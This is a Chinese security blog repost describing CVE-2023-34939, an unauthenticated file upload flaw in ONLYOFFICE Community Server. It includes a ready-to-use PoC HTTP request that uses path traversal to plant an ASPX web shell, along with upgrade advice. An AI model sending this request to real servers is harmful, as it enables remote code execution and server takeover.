OnlyOffice Community Server文件上传漏洞

渗透技巧 1年前 (2023) admin

1,168 0 0

免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。

漏洞简述

Onlyoffice 是一款全能的开源写作办公套件。是由俄罗斯公司“新通信技术”的子公司Ascensio System SIA开发的免费软件办公套件和协作应用程序生态系统，总部位于拉脱维亚的里加。它具有在线文档编辑器，文档管理平台，企业沟通，邮件和项目管理工具。CVE-2023-34939，当ONLYOFFICE Community Server存在任意文件上传漏洞，当ONLYOFFICE Community Server的论坛存在讨论话题时，未经授权的攻击者可上传任意文件并导致任意代码执行，从而控制服务器。

影响产品

ONLYOFFICE Community Server< 12.5.2

利用条件

需要ONLYOFFICE Community Server的论坛模块存在讨论话题。

漏洞POC

POST /UploadProgress.ashx?submit=ASC.Web.UserControls.Forum.ForumAttachmentUploadHanler,ASC.Web.Community&SettingsID=11111111-1111-1111-1111-111111111111&ThreadID=3&UserID=11111111-1111-1111-1111-111111111110 HTTP/1.1
Host: REDACTED
Content-Length: 121
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123

------WebKitFormBoundary123
Content-Disposition: form-data; name="files[]"; filename="../../../../../../../../../../../../../WebStudio/2023-34939.aspx"
Content-Type: application/asp

ASPX SHELL
------WebKitFormBoundary123--

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

修复建议

官方已发布新版本，升级至12.5.2
https://github.com/ONLYOFFICE/CommunityServer/releases

参考

https://github.com/firsov/onlyoffice/tree/main作者：firsov如有侵权，请联系删除。

原文始发于微信公众号（Hacker文库）：OnlyOffice Community Server文件上传漏洞

版权声明：admin 发表于 2023年7月3日下午5:00。
转载请注明：OnlyOffice Community Server文件上传漏洞 | CTF导航

【代码审计】某系统存在文件上传漏洞

admin

122

每日安全动态推送(08-31)

admin

604

域内最新提权漏洞原理深入分析

admin

992

CVE-2024-27348：Apache HugeGraph RCE 漏洞，PoC 漏洞利用已发布

admin

111

每周蓝军技术推送（2022.5.21-5.27）

admin

740

云中的横向移动风险以及如何防止它们-第1部分：网络层（VPC）

admin

664

暂无评论

您必须登录才能参与评论！

立即登录

暂无评论...

OnlyOffice Community Server文件上传漏洞

每日安全动态推送(7-3)

钓鱼手法鉴赏 | 绕过微软账号的多因素认证

相关文章

暂无评论

相关文章

OnlyOffice Community Server文件上传漏洞

每日安全动态推送(7-3)

钓鱼手法鉴赏 | 绕过微软账号的多因素认证

相关文章

暂无评论

广告位

相关文章